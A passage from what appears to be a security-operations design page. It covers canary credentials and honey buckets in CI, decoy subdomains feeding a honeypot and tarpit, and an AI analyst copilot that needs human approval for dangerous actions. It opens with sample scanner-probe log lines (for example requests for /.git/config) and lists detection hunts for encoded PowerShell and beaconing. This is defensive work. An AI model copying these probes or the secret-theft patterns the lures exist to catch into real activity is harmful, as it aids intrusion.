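    '198.51.100.23 - - [15/Jan/2026:09:01:10 +0000] "GET /admin HTTP/1.1" 404 0 "-" "python-requests/2.31"',
    '198.51.100.23 - - [15/Jan/2026:09:01:11 +0000] "GET /.git/config HTTP/1.1" 404 0 "-" "python-requests/2.31"',
    '198.51.100.23 - - [15/Jan/2026:09:01:12 +0000] "GET /debug/dump HTTP/1.1" 404 0 "-" "python-requests/2.31"',
    '192.0.2.44 - - [15/Jan/2026:09:05:00 +0000] "GET /v1/internal/test?x=1 HTTP/1.1" 404 0 "-" "curl/8.4.0"',
]
```

The allow-list is the one place false positives can enter, so keep it short and reviewed: everything else that reaches a lure is, as the page says, malicious by definition.
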
🪣 Honey-Bucket / Honey-S3-Key in CI Runner (T247)

Catches supply-chain implants that try to exfil from CI runner env. The bucket never holds real data; any read = malicious.

Token / bucket | Seeded location | Last touch | State
s3://acme-ci-runner-secrets | CI runner env-var | never | ARMED
AKIA…9v2f (canary) | CI runner env-var | never | ARMED
DOCKER_REGISTRY_TOKEN (canary) | CI runner env-var | never | ARMED
URL https://callback.canarytokens.org/x… | ci-runner /etc/hosts override | never | ARMED

🕳 Decoy Subdomains → Honeypot / Tarpit (T248)

Register obvious-looking legacy subdomains (dev-old., staging-backup., admin-legacy.) pointing to a honeypot. Any scanner hit is logged + profiled. Optional retaliatory tarpit drops attacker scan speed to <1 rps.

Subdomain | Bait kind | Hits (7d) | Top source | State
dev-old.[your-org].com | fake WP-admin login | 212 | AS45090 HK | SCANNED · profiled
staging-backup.[your-org].com | phpMyAdmin lookalike | 84 | Tor exits | SCANNED
admin-legacy.[your-org].com | fake JIRA login | 48 | AS9009 RO | TARPIT · 0.3 rps
internal-docs.[your-org].com | SSO login form (canary) | 14 | mixed | CRED-HARVEST attempt
vpn-old.[your-org].com | Fortinet login banner | 42 | AS62240 NL | N-day probe

Signatures fed to WAF + DNS block-list + ISAC share. All traffic is by definition malicious — zero FP.

🤝 Analyst Copilot (Tier 4)

AI multiplies the analyst — it does not replace them. The copilot lives inside the protection perimeter: same scoping, audit, and egress controls as any privileged user.

Analyst throughput: 3.1× (actions / day vs pre-copilot)
Queries (30d): NL → data-lake
Auto-drafted reports: 312 (all human-edited)
Tool-call interstitials: 842 (dangerous → approved)

🧹 Triage Copilot — Cluster · Enrich · Recommend (T260)

Groups related alerts, pulls threat-intel enrichment, suggests next-action with confidence score. Analyst confirms or overrides.

Capability | Status | Latency
Alert clustering by entity + time-window | LIVE | < 400 ms
TI enrichment (IOCs → reputation + sightings) | LIVE | < 1 s
Next-action recommendation with confidence + rationale | LIVE | ~ 3 s
Similar-past-incidents retrieval (vector search) | LIVE | ~ 2 s
One-click override with outcome logged back for tuning | LIVE |

🎯 Hunt Copilot — NL → Query (T261)

"Show hosts that beaconed to TLDs we've never seen in 30 days" → generated SQL/KQL + result. Analyst learns the dialect from the outputs.

Natural-language ask | Generated query (abbrev.) | Latency
beaconing to unseen TLDs 30d | WITH new_tlds AS … | 2.1 s
users who logged in from > 3 countries last week | GROUP BY user HAVING COUNT(DISTINCT country) > 3 | 0.9 s
any EC2 without IMDSv2 in prod | cnapp.ec2 WHERE imds_v2_required=false | 0.6 s
PowerShell encoded-cmd parent ≠ explorer | process_create WHERE image='powershell.exe' AND … | 1.4 s

🔍 Explain-the-Alert — Lineage + Signal Path (T262)

"Why did this fire?" — walks the chain: rule → data-source → raw events → ATT&CK tag → similar past incidents → suggested next question.

Output section | Purpose
Rule → data-source chain | what sensor + normalisation step surfaced this
Raw events window | prev/next 10 events for that entity
ATT&CK tagging | tactic / technique / sub-technique with confidence
Similar past incidents (vector) | human-playbook that resolved it last time
Suggested next query | narrows the uncertainty by one step

📝 Response Copilot — Draft Comms + Playbook Author (T263)

Exec summary, user comms, legal-ready timeline, regulator notice. Redlined by analyst before send. No auto-send on anything human-bound.

Artefact | Template source | Human-review required
Exec summary (1-pager) | board-facing template | ✓ required
Affected-user DM + email | plain-language template | ✓ required
Legal / breach-coach timeline | legal-ready narrative | ✓ required
Regulator notice (72 h) | DPDP · GDPR · SEC 8-K · HIPAA | ✓ + legal-sign-off
New playbook draft (YAML) | detection-as-code repo | ✓ + PR review

📊 Report Copilot — Monthly Board Report (T264)

Pulls 8 board metrics + top incidents + roadmap deltas. Auto-PDF. Editable before share.

Section | Source
MTTD · MTTR · dwell · blast-radius | incident graph (T203)
ATT&CK coverage % | heatmap (T205)
Phishing click + report rate | human-security
Edge-patch SLA | CTEM
Analyst throughput delta | this copilot pane
Top incidents narrative | copilot-drafted · analyst-approved
Roadmap progress vs plan | build-order checklist

💡 Hypothesis-Gen Copilot (T265)

Given the last 7 days' telemetry deltas, proposes five untested hunt hypotheses. The best ones graduate to hunt-as-code (T208).

This week's suggestions | Why
Unusual Azure Graph read-rate by first-use apps | new tenant apps surged 18% · not yet monitored
Snowflake SHOW WAREHOUSES by non-admins | attacker-reconnaissance pattern recently published
New parent-child pattern: signed.exe → lolbas.exe | gap in ATT&CK Defense Evasion (69% coverage)
Kubernetes exec into pod by first-seen ServiceAccount | new SAs in prod-eks-1 last week
OIDC token minted for workload outside approved-IP | expanding OIDC use — drift expected

📜 Copilot Audit Log — UEBA on the Agent (T266)

Every tool-call, prompt, output, and override is logged. Same scrutiny as a privileged Linux shell. 7y retention. Analyst anomaly baselines apply.

Field | Captured
User + session + copilot model version | ✓ per turn
Full prompt (system + user) + retrieved context | ✓ hash + content
Every tool invocation + arguments | ✓ pre-call + post-call
Output streamed back to user |
Human override / acceptance of suggestion | ✓ outcome feeds tuning
UEBA on agent trails | ✓ same peer-baseline engine

🧑‍✈️ Tool-Call Interstitial — Dangerous Actions Require Human (T267)

No model-autonomous isolate / delete / send. An interstitial UI confirms the action, shows the audit record, and records the approving user. The model can propose; only a human disposes.

Action class | Interstitial? | Why
Read-only query on the lake | no | zero-harm
TI / IOC enrichment | no | zero-harm
Draft message / playbook | no | no-send
Disable user · isolate host · rotate secret | YES | reversible but impactful
Quarantine mail org-wide | YES | communication impact
Delete / destroy data · send to external recipient | HARD BLOCK | never by model · L3 human-only